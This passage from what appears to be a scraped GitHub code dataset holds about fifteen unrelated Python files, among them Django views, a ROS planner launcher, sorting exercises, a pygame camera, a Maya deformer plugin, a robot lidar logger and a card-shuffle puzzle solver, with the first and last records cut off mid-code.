pass\n elif isinstance(target, torch.Tensor):\n target = target.view(-1).numpy().tolist()\n else:\n raise TypeError\n\n indices = [[] for _ in range(classes_num)]\n for i, e in enumerate(target):\n indices[int(e)].append(i)\n\n batch_size = len(target)\n braid_indices = []\n for sub_indices in indices:\n braid_sub_indices = sub_indices + [i + batch_size for i in sub_indices]\n braid_indices.append(braid_sub_indices)\n\n","repo_name":"wang93/SiameseNet","sub_path":"SampleRateLearning/stable_batchnorm/global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18514023710","text":"from django.shortcuts import render\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\n\nfrom storeapp.models import Products\nfrom tagsapp.models import LabelTag\n\n\ndef home(request):\n # it will return this product contentype id\n queryset = ContentType.objects.get_for_model(Products)\n\n# here we can use it for indentation\n LabelTag.objects.select_related(\"Lable\").\\\n filter(\n content_type=queryset,\n object_id=1\n )\n\n return render(request, \"store/home.html\")\n\n\ndef updatedata(request):\n # if we give it here without any filter or specific field then it will update all fiedls data \n queryset = Products.objects.update(\n name=\"aalu\", price=44.2, quantity=44)\n print(queryset)\n return render(request, \"store/home2.html\")\n","repo_name":"Gauravraj1141/Django-100-Days","sub_path":"CodeWithMosh/Newqueryset/mystore/storeapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37458475289","text":"import rospy\nimport os\nimport sys\n\nroot_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\nsys.path.insert(0, root_dir)\n\nimport yaml\nimport argparse\nfrom planner import get_planner\nfrom datetime import datetime\n\n\ndef main():\n # planning experiment in simulator using a specific planner\n args = parse_args()\n rospy.init_node(args.planner_type)\n # find planner configuration file\n\n experiment_path = os.path.join(\n root_dir,\n \"experiments\",\n \"simulator\",\n datetime.now().strftime(\"%d-%m-%Y-%H-%M\"),\n )\n\n planner_cfg_path = os.path.join(\n \"planning/config\", f\"{args.planner_type}_planner.yaml\"\n )\n assert os.path.exists(planner_cfg_path)\n with open(planner_cfg_path, \"r\") as config_file:\n planner_cfg = yaml.safe_load(config_file)\n planner_cfg.update(args.__dict__)\n\n planner_cfg[\"planner_type\"] = args.planner_type\n planner_cfg[\"experiment_path\"] = experiment_path\n planner_cfg[\"experiment_id\"] = \"record\"\n\n nbv_planner = get_planner(planner_cfg)\n\n nbv_planner.start()\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n # mandatory arguments\n parser.add_argument(\n \"--planner_type\", \"-P\", type=str, required=True, help=\"planner_type\"\n )\n # arguments with default values\n parser.add_argument(\n \"--planning_budget\",\n \"-BG\",\n type=int,\n default=20,\n help=\"maximal measurments for the mission\",\n )\n parser.add_argument(\n \"--device\",\n type=str,\n default=\"cuda\",\n help=\"config file path\",\n )\n parser.add_argument(\n \"--gpu_id\",\n type=str,\n default=\"0\",\n help=\"gpu to use, space delimited\",\n )\n parser.add_argument(\n \"--initial_view\",\n type=list,\n default=[0, 0],\n help=\"prefixed initial camera view angle\",\n )\n parser.add_argument(\n \"--random_initial\",\n action=\"store_true\",\n help=\"use random inital camera pose\",\n )\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dmar-bonn/neu-nbv","sub_path":"scripts/planning/simulator_planning.py","file_name":"simulator_planning.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"75"} +{"seq_id":"71592121843","text":"import random\n\ndef linear_search(A, n, i, x):\n\t# A: array, n: number of elements in the array, i: index,\n\t# x: number that is searched in the array\n\tif i > n:\n\t\treturn -1\n\telif i <= n and A[i] == x:\n\t\treturn i\n\telif i <= n and A[i] != x:\n\t\treturn linear_search(A, n, i + 1, x)\n\ndef find_smallest(A, n, i):\n\tsmallest_index = i\n\tfor j in range(i, n):\n\t\tif A[j] < A[smallest_index]:\n\t\t\tsmallest_index = j\n\treturn smallest_index\n\ndef selection_sort(A, n):\n\tfor i in range(0, n):\n\t\tprint(A)\n\t\tsmallest_index = find_smallest(A, n, i)\n\t\ttemp = A[smallest_index] \n\t\tA[smallest_index] = A[i]\n\t\tA[i] = temp\n\treturn A\n\n\nlist10 = []\nfor i in range(10):\n\tlist10.append(random.randrange(1, 100))\n\nprint(list10)\nindex_smallest = find_smallest(list10, len(list10), 0)\nprint(\"list10[\", index_smallest, \"] = \", list10[index_smallest], sep='')\nselection_sort(list10, len(list10))\nprint(\"\\nThe last print\\n\")\nprint(list10)","repo_name":"gcakir/Algorithms_and_Data_Structures","sub_path":"Python/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72732965041","text":"# 210115 이진 변환 반복하기\n# 0과 1로 이루어진 문자열 s의 이진 변환 횟수와 변환 과정에서 제거된 모든 0의 개수를 배열에 담아 return\n\ndef solution(s):\n cnt_0 = 0 # 변환 과정에서 제거되는 0의 개수\n cnt_bin = 0 # 이진 변환의 횟수\n while s != '1' :\n cnt_0 += s.count('0') # 문자열s의 모든 0 제거\n s = bin(s.count('1'))[2:] # s = s에서 모든 0을 제거한 문자열의 길이\n cnt_bin += 1\n answer = [cnt_bin, cnt_0]\n return answer\n\n# testcode\nprint(solution(\"110010101001\")) #[3,8]\nprint(solution(\"01110\")) #[3,3]\nprint(solution(\"1111111\")) #[4,1]","repo_name":"xxhyowon/Algorithm-Python","sub_path":"[020] 이진 변환 반복하기.py","file_name":"[020] 이진 변환 반복하기.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"34428459139","text":"def solution(N):\n count = 0\n empt = []\n res = str(bin(N))\n for i in res[2:]:\n if i == \"0\":\n count += 1\n elif i != \"0\":\n empt.append(count)\n count = 0\n return max(empt)\n\nprint(solution(1041))\nprint(solution(15))","repo_name":"mbarbour0/Practice","sub_path":"Binary/Binary1.py","file_name":"Binary1.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29804532215","text":"import pygame\nfrom tools import rotation\nfrom math import pi\n\nclass Camera:\n def __init__(self, pos=(0, 0, 0), rot=(0, 0, 0)):\n self.pos = list(pos)\n self.rot = list(rot)\n\n def events(self, event):\n if event.type == pygame.MOUSEMOTION:\n x, y = event.rel\n x /= 200 # mouse sensor\n y /= 200 # mouse sensor\n self.rot[0] += y; self.rot[1] -= x\n\n def update(self, dt, keys): # camera movements\n\n if keys[pygame.K_LSHIFT]: self.pos[1] += dt # move up\n if keys[pygame.K_SPACE]: self.pos[1] -= dt # move down\n\n if keys[pygame.K_z]: # move foward\n forward = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [0, 0, 1])\n self.pos[0] += dt * forward[0]\n self.pos[1] += dt * forward[1]\n self.pos[2] += dt * forward[2]\n \n if keys[pygame.K_s]: # move backward\n backward = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [0, 0, 1])\n self.pos[0] -= dt * backward[0]\n self.pos[1] -= dt * backward[1]\n self.pos[2] -= dt * backward[2]\n\n if keys[pygame.K_d]: # move right\n left = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [1, 0, 0])\n self.pos[0] += dt * left[0]\n self.pos[1] += dt * left[1]\n self.pos[2] += dt * left[2]\n\n if keys[pygame.K_q]: # move left\n right = rotation(-self.rot[0], -self.rot[1], -self.rot[2], [1, 0, 0])\n self.pos[0] -= dt * right[0]\n self.pos[1] -= dt * right[1]\n self.pos[2] -= dt * right[2]\n\n if keys[pygame.K_w]: self.rot[2] -= dt /10 # rotate the right side\n if keys[pygame.K_x]: self.rot[2] += dt /10 # rotate the left side\n if keys[pygame.K_5]: self.rot[0] = pi / 2; self.pos = [0, -12, 0]","repo_name":"Ganta-KH/Billiard-Pool-Table","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25556546005","text":"import os\nimport torch\nimport argparse\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib.animation as anim\n\n# own libraries\nfrom eipl.model import BasicLSTM, BasicMTRNN\nfrom eipl.utils import normalization\nfrom eipl.utils import restore_args, tensor2numpy\nfrom eipl.data import WeightDownloader\n\n\n# argument parser\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--filename\", type=str, default=None)\nparser.add_argument(\"--idx\", type=str, default=\"0\")\nparser.add_argument(\"--pretrained\", action=\"store_true\")\nargs = parser.parse_args()\n\n# check args\nassert args.filename or args.pretrained, \"Please set filename or pretrained\"\n\n# load pretrained weight\nif args.pretrained:\n WeightDownloader(\"airec\", \"grasp_bottle\")\n args.filename = os.path.join(\n os.path.expanduser(\"~\"), \".eipl/airec/grasp_bottle/weights/RNN/model.pth\"\n )\n\n# restore parameters\ndir_name = os.path.split(args.filename)[0]\nparams = restore_args(os.path.join(dir_name, \"args.json\"))\nidx = int(args.idx)\n\n# load dataset\nminmax = [params[\"vmin\"], params[\"vmax\"]]\nfeat_bounds = np.load(\"../cae/data/feat_bounds.npy\")\n_feats = np.load(\"../cae/data/test/features.npy\")\ntest_feats = normalization(_feats, feat_bounds, minmax)\ntest_joints = np.load(\"../cae/data/test/joints.npy\")\nx_data = np.concatenate((test_feats, test_joints), axis=-1)\nx_data = torch.Tensor(x_data)\nin_dim = x_data.shape[-1]\n\n# define model\nif params[\"model\"] == \"LSTM\":\n model = BasicLSTM(in_dim=in_dim, rec_dim=params[\"rec_dim\"], out_dim=in_dim)\nelif params[\"model\"] == \"MTRNN\":\n model = BasicMTRNN(in_dim, fast_dim=60, slow_dim=5, fast_tau=2, slow_tau=12)\nelse:\n assert False, \"Unknown model name {}\".format(params[\"model\"])\n\nif params[\"compile\"]:\n model = torch.compile(model)\n\n# load weight\nckpt = torch.load(args.filename, map_location=torch.device(\"cpu\"))\nmodel.load_state_dict(ckpt[\"model_state_dict\"])\nmodel.eval()\n\n# Inference\ny_hat = []\nstate = None\nT = x_data.shape[1]\nfor i in range(T):\n _y, state = model(x_data[:, i], state)\n y_hat.append(_y)\n\ny_hat = torch.permute(torch.stack(y_hat), (1, 0, 2))\ny_hat = tensor2numpy(y_hat)\ny_joints = y_hat[:, :, 10:]\ny_feats = y_hat[:, :, :10]\n\n# plot animation\nfig, ax = plt.subplots(1, 2, figsize=(8, 4), dpi=60)\n\n\ndef anim_update(i):\n for j in range(2):\n ax[j].cla()\n\n ax[0].set_ylim(-0.1, 1.1)\n ax[0].set_xlim(0, T)\n ax[0].plot(test_joints[idx, 1:], linestyle=\"dashed\", c=\"k\")\n for joint_idx in range(8):\n ax[0].plot(np.arange(i + 1), y_joints[idx, : i + 1, joint_idx])\n ax[0].set_xlabel(\"Step\")\n ax[0].set_title(\"Joint angles\")\n\n ax[1].set_ylim(-0.1, 1.1)\n ax[1].set_xlim(0, T)\n ax[1].plot(test_feats[idx, 1:], linestyle=\"dashed\", c=\"k\")\n for joint_idx in range(10):\n ax[1].plot(np.arange(i + 1), y_feats[idx, : i + 1, joint_idx])\n ax[1].set_xlabel(\"Step\")\n ax[1].set_title(\"Image features\")\n\n\nani = anim.FuncAnimation(fig, anim_update, interval=int(np.ceil(T / 10)), frames=T)\nani.save(\"./output/{}_{}_{}.gif\".format(params[\"model\"], params[\"tag\"], idx))\n\n# If an error occurs in generating the gif animation or mp4, change the writer (imagemagick/ffmpeg).\n# ani.save(\"./output/{}_{}_{}.gif\".format(params[\"model\"], params[\"tag\"], idx), writer=\"imagemagick\")\n# ani.save(\"./output/{}_{}_{}.mp4\".format(params[\"model\"], params[\"tag\"], idx), writer=\"ffmpeg\")\n","repo_name":"ogata-lab/eipl","sub_path":"eipl/zoo/rnn/bin/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"75"} +{"seq_id":"23131637362","text":"import time\n\nimport numpy as np\nimport py_at_broker as pab\n\nb = pab.broker()\nprint(b.register_signal(\"franka_target_pos\", pab.MsgType.target_pos))\ntime.sleep(0.5)\nprint(b.request_signal(\"franka_lidar\", pab.MsgType.franka_lidar))\nprint(b.request_signal(\"realsense_images\", pab.MsgType.realsense_image))\nprint(b.request_signal(\"franka_state\", pab.MsgType.franka_state))\ntime.sleep(0.5)\n\ncounter = 0\ndefault_pos_c = np.array([0.62, 0.00, 0.56])\n\n\ndef pos_msg(pos):\n msg = pab.target_pos_msg()\n msg.set_ctrl_t(pab.CtrlType.Cartesian)\n msg.set_pos(pos)\n msg.set_timestamp(time.clock_gettime(time.CLOCK_MONOTONIC))\n msg.set_fnumber(counter)\n msg.set_time_to_go(time2go)\n b.send_msg(\"franka_target_pos\", msg)\n\n\nstate = b.recv_msg(\"franka_state\", -1)\ncurrent_pos_c = state.get_c_pos()\nprint(\"initial pos: {}\".format(current_pos_c))\n\nn_points = 100\nn_runs = 10\ntime2go = 1.0\ndelta = 2 * np.pi / n_points\nR = 0.2\n\nlidar_list = []\ntrajectory = []\nc = 0\nn_samples = 1\n\n\nWallMin = [0.28, -0.78, 0.02]\nWallMax = [0.82, 0.78, 1.08]\n\nX = np.random.uniform(WallMin[0], WallMax[0], 100)\nY = np.random.uniform(WallMin[1], WallMax[1], 100)\nZ = np.random.uniform(WallMin[2], WallMax[2], 100)\n\nruns = 0\n\nwhile runs < 10:\n print(\"RUNS: \", runs)\n try:\n pos_msg(default_pos_c)\n time.sleep(2.0)\n state = b.recv_msg(\"franka_state\", -1)\n pos_c = state.get_c_pos()\n print(\"default pos: {}\".format(default_pos_c))\n print(\"current pos: {}\".format(pos_c))\n counter += 1\n time.sleep(2.0)\n for _ in range(300):\n # define next position\n pos_c = pos_c + np.random.uniform(-0.02, 0.02, 3)\n # [x, y, z]\n print(pos_c)\n trajectory.append(pos_c)\n # move\n print(\"move robot\")\n pos_msg(pos_c)\n # stop\n # time.sleep(0.5)\n print(\"start lidar data collected\")\n # measure\n lidar = b.recv_msg(\"franka_lidar\", -1)\n lidar_list.append(lidar.get_data())\n counter += 1\n\n new_state = b.recv_msg(\"franka_state\", -1)\n print(\"next pos: {}\".format(new_state.get_c_pos()))\n counter += 1\n\n lidar_array = np.array(lidar_list)\n trajectory_array = np.array(trajectory)\n np.save(\"./random_data/lidar_\" + str(runs) + \".npy\", lidar_array)\n np.save(\"./random_data/trajectory\" + str(runs) + \".npy\", trajectory_array)\n runs += 1\n except KeyboardInterrupt:\n lidar_array = np.array(lidar_list)\n trajectory_array = np.array(trajectory)\n np.save(\"./random_data/lidar_\" + str(runs) + \".npy\", lidar_array)\n np.save(\"./random_data/trajectory\" + str(runs) + \".npy\", trajectory_array)\n runs += 1\n","repo_name":"georgosgeorgos/DLRC_2018","sub_path":"project_dlrc2018/scripts/tutorials/create_random_trajectory.py","file_name":"create_random_trajectory.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"73102310962","text":" \nimport unittest\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n # 虚拟头结点\n dummy = ListNode(-1)\n p, p1, p2 = dummy, l1, l2 \n\n while p1 != None and p2 != None:\n # 比较 p1 和 p2 两个指针\n # 将值较小的的节点接到 p 指针\n if p1.val > p2.val:\n p.next = p2 \n p2 = p2.next \n else:\n p.next = p1 \n p1 = p1.next \n # p 指针不断前进\n p = p.next \n\n if p1 != None:\n p.next = p1\n \n if p2 != None:\n p.next = p2\n\n return dummy.next\n \n\nclass TestSolution(unittest.TestCase):\n def test_0(self):\n s = 1994\n res = \"MCMXCIV\"\n self.assertEqual(res, Solution().intToRoman(s))\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"yiluohan1234/LeetCode-Python","sub_path":"第一章/链表/0021mergeTwoLists.py","file_name":"0021mergeTwoLists.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4049492979","text":"\nimport maya.OpenMayaMPx as OpenMayaMPx\nimport maya.OpenMaya as OpenMaya\nimport maya.cmds as cmds\n\nkDefaultStringAttrValue = 'default'\n\n\nclass BLENDWRRAP(OpenMayaMPx.MPxDeformerNode):\n kPluginNodeName = 'blendwrap'\n kPluginNodeId = OpenMaya.MTypeId(0xBA00110)\n strength = OpenMaya.MObject()\n connected_mesh = OpenMaya.MObject()\n snap_offset = OpenMaya.MObject()\n\n def __init__(self):\n OpenMayaMPx.MPxDeformerNode.__init__(self)\n self.default_val = False\n\n def get_input_geom(self, data, geom_idx):\n input_attr = data.outputArrayValue(self.input)\n input_handle = data.outputArrayValue(self.input)\n input_handle.jumpToElement(geom_idx)\n input_geom_obj = input_handle.outputValue().child(self.inputGeom).asMesh()\n return input_geom_obj\n\n def getUV_val(self, Source_Loc_xform, mfnMesh, Geo_name):\n loc_point = OpenMaya.MPoint(Source_Loc_xform[0], Source_Loc_xform[1], Source_Loc_xform[2])\n pos = OpenMaya.MPoint()\n mfnMesh.getClosestPoint(loc_point, pos, OpenMaya.MSpace.kWorld)\n #currentUvSet = cmds.polyUVSet(Geo_name, q=True, cuv=True)\n uv_mPoint = OpenMaya.MPoint(pos.x, pos.y, pos.z, 1.0)\n uv = OpenMaya.MScriptUtil()\n uv.createFromList([0.0, 0.0], 2)\n uvPtr = uv.asFloat2Ptr()\n mfnMesh.getUVAtPoint(uv_mPoint, uvPtr, OpenMaya.MSpace.kWorld)\n u_val = uv.getFloat2ArrayItem(uvPtr, 0, 0)\n v_val = uv.getFloat2ArrayItem(uvPtr, 0, 1)\n return (u_val, v_val)\n\n def get_point_position(self, mfnMesh, geo_name, u, v):\n meshFn = mfnMesh\n faceCount = mfnMesh.numFaceVertices()\n\n # convert uv to ptr\n util = OpenMaya.MScriptUtil()\n util.createFromList((u, v), 2)\n uvPtr = util.asFloat2Ptr()\n\n positionMPoint = OpenMaya.MPoint()\n currentUvSet = []\n meshFn.getUVSetNames(currentUvSet)\n tolerance = 0.01\n\n # check each face for uv\n # worldPos = {'face#': [x,y,z]}\n worldPos = []\n\n for faceIndex in range(faceCount):\n try:\n mfnMesh.getPointAtUV(faceIndex, positionMPoint, uvPtr, OpenMaya.MSpace.kWorld, currentUvSet[0],\n tolerance)\n worldPos.append(positionMPoint.x)\n worldPos.append(positionMPoint.y)\n worldPos.append(positionMPoint.z)\n # worldPos[faceIndex] = (positionMPoint.x, positionMPoint.y, positionMPoint.z)\n except:\n pass\n\n return worldPos\n\n def deform(self,\n data, # dataBlock\n geom_iter, # geom iteration class instance\n matrix, # local to worl matrix\n geom_index):\n\n # query the geo\n connected_mesh = data.inputValue(self.connected_mesh).asMesh()\n strength = data.inputValue(self.strength).asFloat()\n snap_offset = data.inputValue(self.snap_offset).asShort()\n envelope = data.inputValue(self.envelope).asFloat()\n\n thisNode = self.thisMObject()\n socketNode = OpenMaya.MFnDependencyNode(thisNode)\n\n node_name = socketNode.name()\n #geo_name = self.deformer_class.getAffectedGeometry(node_name).keys()[0]\n\n input_mesh = self.get_input_geom(data, geom_index)\n input_mfnMesh = OpenMaya.MFnMesh(input_mesh)\n input_mpointArray = OpenMaya.MPointArray()\n input_mfnMesh.getPoints(input_mpointArray, OpenMaya.MSpace.kWorld)\n\n connected_mfnmesh = OpenMaya.MFnMesh(connected_mesh)\n connected_mpointArray = OpenMaya.MPointArray()\n connected_mfnmesh.getPoints(connected_mpointArray, OpenMaya.MSpace.kWorld)\n connected_geo_name = cmds.listConnections(node_name + '.ConnectMesh')[0]\n\n value = cmds.listConnections(node_name + '.ConnectMesh')\n if self.default_val == False:\n if value != None:\n\n self.vtx_default_pos = {}\n self.uv_pos = {}\n\n for i in range(input_mpointArray.length()):\n x_val = input_mpointArray[i].x\n y_val = input_mpointArray[i].y\n z_val = input_mpointArray[i].z\n world_pos_val = [x_val, y_val, z_val]\n u, v = self.getUV_val(Source_Loc_xform=world_pos_val,\n mfnMesh=connected_mfnmesh,\n Geo_name=connected_geo_name)\n\n position = self.get_point_position(mfnMesh=connected_mfnmesh,\n geo_name=connected_geo_name,\n u=u,\n v=v)\n\n self.vtx_default_pos[i] = position\n self.uv_pos[i] = [u, v]\n self.default_val = True\n if snap_offset == 1:\n a = 0\n mpoint_mesh_Array = OpenMaya.MPointArray()\n while (geom_iter.isDone() == False):\n new_x_val = self.vtx_default_pos[a][0]\n new_y_val = self.vtx_default_pos[a][1]\n new_z_val = self.vtx_default_pos[a][2]\n\n pt = OpenMaya.MPoint(new_x_val, new_y_val, new_z_val)\n mpoint_mesh_Array.append(pt)\n a += 1\n geom_iter.next()\n geom_iter.setAllPositions(mpoint_mesh_Array)\n\n else:\n a = 0\n mpoint_mesh_Array = OpenMaya.MPointArray()\n while (geom_iter.isDone() == False):\n weight = self.weightValue(data, geom_index, geom_iter.index())\n pointPosition = geom_iter.position()\n u_v_val = self.uv_pos[a]\n position = self.get_point_position(mfnMesh=connected_mfnmesh,\n geo_name=connected_geo_name,\n u=u_v_val[0],\n v=u_v_val[1])\n\n x_diff = (position[0] - self.vtx_default_pos[a][0]) * strength * envelope * weight\n y_diff = (position[1] - self.vtx_default_pos[a][1]) * strength * envelope * weight\n z_diff = (position[2] - self.vtx_default_pos[a][2]) * strength * envelope * weight\n\n new_env = envelope - 1\n snap_x_val = (position[0] - pointPosition.x) * new_env\n snap_y_val = (position[1] - pointPosition.y) * new_env\n snap_z_val = (position[2] - pointPosition.z) * new_env\n\n if snap_offset == 0:\n new_x_val = pointPosition.x + x_diff\n new_y_val = pointPosition.y + y_diff\n new_z_val = pointPosition.z + z_diff\n if snap_offset == 1:\n new_x_val = position[0] + snap_x_val\n new_y_val = position[1] + snap_y_val\n new_z_val = position[2] + snap_z_val\n\n pt = OpenMaya.MPoint(new_x_val, new_y_val, new_z_val)\n mpoint_mesh_Array.append(pt)\n # geom_iter.setPosition( pt )\n a += 1\n geom_iter.next()\n geom_iter.setAllPositions(mpoint_mesh_Array)\n\n\ndef creator():\n return OpenMayaMPx.asMPxPtr(BLENDWRRAP())\n\n\ndef initialize():\n nAttr = OpenMaya.MFnNumericAttribute()\n nMAttr = OpenMaya.MFnMatrixAttribute()\n cAttr = OpenMaya.MFnCompoundAttribute()\n tAttr = OpenMaya.MFnTypedAttribute()\n eAttr = OpenMaya.MFnEnumAttribute()\n\n # string attr\n\n BLENDWRRAP.strength = nAttr.create(\"strength\", \"str\", OpenMaya.MFnNumericData.kFloat, 1.0)\n nAttr.setKeyable(True)\n\n BLENDWRRAP.connected_mesh = tAttr.create('ConnectMesh', 'cm', OpenMaya.MFnData.kMesh)\n tAttr.setWritable(True)\n tAttr.setStorable(True)\n tAttr.setReadable(True)\n tAttr.setKeyable(True)\n\n BLENDWRRAP.snap_offset = eAttr.create(\"Condition\", \"con\", 0)\n eAttr.addField(\"offset\", 0)\n eAttr.addField(\"snap\", 1)\n eAttr.setHidden(False)\n eAttr.setKeyable(True)\n eAttr.setStorable(True)\n\n BLENDWRRAP.addAttribute(BLENDWRRAP.strength)\n BLENDWRRAP.addAttribute(BLENDWRRAP.connected_mesh)\n BLENDWRRAP.addAttribute(BLENDWRRAP.snap_offset)\n\n outputGeom = OpenMayaMPx.cvar.MPxGeometryFilter_outputGeom\n BLENDWRRAP.attributeAffects(BLENDWRRAP.strength, outputGeom)\n BLENDWRRAP.attributeAffects(BLENDWRRAP.connected_mesh, outputGeom)\n BLENDWRRAP.attributeAffects(BLENDWRRAP.snap_offset, outputGeom)\n\n cmds.makePaintable(BLENDWRRAP.kPluginNodeName, 'weights', attrType='multiFloat', shapeMode='deformer')\n\n\ndef initializePlugin(obj):\n plugin = OpenMayaMPx.MFnPlugin(obj)\n try:\n plugin.registerNode(BLENDWRRAP.kPluginNodeName,\n BLENDWRRAP.kPluginNodeId,\n creator,\n initialize,\n OpenMayaMPx.MPxNode.kDeformerNode)\n except:\n raise \"Failed to register node: %s\" % BLENDWRRAP.kPluginNodeName\n\n\ndef uninitializePlugin(obj):\n plugin = OpenMayaMPx.MFnPlugin(obj)\n try:\n plugin.deregisterNode(BLENDWRRAP.kPluginNodeId)\n except:\n raise \"Failed to deregister node: %s\" % BLENDWRRAP.kPluginNodeName\n","repo_name":"NikheelP/Spark_","sub_path":"spark/department/CFX/deformer/blendWrap.py","file_name":"blendWrap.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4033339453","text":"def somar(a=0, b=0, c=0):\n s = a + b + c\n return s\n\n# Programa Principal\nr1 = somar(3)\nr2 = somar(3, 2)\nr3 = somar(3, 2, 5)\n\nprint('Os resultados foram {}, {} e {}'.format(r1, r2, r3))\n\n","repo_name":"ascaniopy/python","sub_path":"Modulo III/aula021-funcaoComRetorno.py","file_name":"aula021-funcaoComRetorno.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38104188273","text":"\r\n\r\n\r\n#tip calculator\r\n\r\nprint(\"welcome to the tip calculator \")\r\n\r\nbill = float(input(\"what was the total bill \"))\r\n\r\ntip = int(input(\"what percentage tip would you like to give ? 10, 12,or 15 \"))\r\n\r\nsplit = int(input(\"how many people to split the bill \"))\r\n\r\nadd_tip = (tip/100*bill)\r\n\r\nfinal_bill = bill + add_tip\r\n\r\nsplite_bill = final_bill / split\r\n\r\nspliting= round(splite_bill,2)\r\n\r\nspliting = \"{:.2f}\".format(splite_bill)\r\n\r\nprint(f\"each person should pay {spliting}\")\r\n","repo_name":"5umitmishra/basic_python","sub_path":"tip_calculator.py","file_name":"tip_calculator.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"776268771","text":"import os\nfrom collections import OrderedDict\nimport simplejson as json\n\nfrom config import Config\n\n\nclass SensorGenerator:\n def __init__(self, juice_config: Config):\n self.juice_config = juice_config\n\n def _generate_sensor_json(self, instrument_name: str, sensor_name: str, target_name: str) -> OrderedDict:\n \"\"\" Creates a sensor JSON with all necessary entries.\n\n :param instrument_name: Name of instrument (e.g. \"MAJIS\")\n :param sensor_name: Name of sensor (e.g. \"JUICE_MAJIS_IR\")\n :param target_name: Name of target body (e.g. \"Callisto)\n :return: sensor JSON as OrderedDict\n \"\"\"\n sensor_json = self.juice_config.get_template_sensor()\n edit_entry = sensor_json[\"items\"][0]\n edit_entry[\"name\"] = sensor_name\n edit_entry[\"geometry\"][\"instrName\"] = sensor_name\n edit_entry[\"geometry\"][\"target\"] = target_name\n edit_entry[\"geometry\"][\"frustumColor\"] = \\\n self.juice_config.get_sensor_colors()[instrument_name]\n return sensor_json\n\n def generate_sensors(self, observation_dict: OrderedDict, target_name: str, output_folder_path: str) -> None:\n \"\"\" Generates and saves all necessary sensor JSON files for given observation.\n\n :param observation_dict: Dictionary generated by TimelineProcessor\n :param target_name: Name of target body (e.g. \"Callisto)\n :param output_folder_path: Path to already created output folder.\n \"\"\"\n # If you change the filenames, you need to change the TimelineProcessor as well\n sensor_folder_path = os.path.abspath(os.path.join(output_folder_path, \"sensors\"))\n os.makedirs(sensor_folder_path)\n for instrument_name, sensor_dict in observation_dict.items():\n for sensor_name in sensor_dict:\n sensor_json = self._generate_sensor_json(instrument_name,\n sensor_name, target_name)\n sensor_json_name = \"sensor_{}_{}.json\".format(sensor_name, target_name)\n with open(os.path.join(sensor_folder_path, sensor_json_name), 'w+') as outfile:\n json.dump(sensor_json, outfile, indent=2)\n","repo_name":"MStefko/ESA-Mapps2Cosmographia","sub_path":"timeline_processor/sensor_generator.py","file_name":"sensor_generator.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31814473235","text":"\n\n\ndef new_stack(deck):\n return deck[::-1]\n\ndef cut(deck, index):\n return deck[index:] + deck[:index]\n\ndef deal_with_increment(deck, increment):\n new_deck = [False] * len(deck)\n index = 0\n for card in deck:\n new_deck[index] = card\n index += increment\n index = index % len(deck)\n\n return new_deck\n\ndef shuffle(deck, instructions):\n for instruction in instructions:\n if instruction == \"deal into new stack\":\n deck = new_stack(deck)\n elif instruction.startswith(\"cut\"):\n deck = cut(deck, int(instruction.split()[-1]))\n elif instruction.startswith(\"deal with increment\"):\n deck = deal_with_increment(deck, int(instruction.split()[-1]))\n return deck\n\n\nif __name__ == '__main__':\n instructions = [\n 'deal with increment 7',\n 'deal into new stack',\n 'deal into new stack',\n ]\n assert(shuffle(list(range(10)), instructions) == [0, 3, 6, 9, 2, 5, 8, 1, 4, 7])\n\n instructions = [\n 'cut 6',\n 'deal with increment 7',\n 'deal into new stack',\n ]\n assert(shuffle(list(range(10)), instructions) == [3, 0, 7, 4, 1, 8, 5, 2, 9, 6])\n\n instructions = [\n 'deal into new stack',\n 'cut -2',\n 'deal with increment 7',\n 'cut 8',\n 'cut -4',\n 'deal with increment 7',\n 'cut 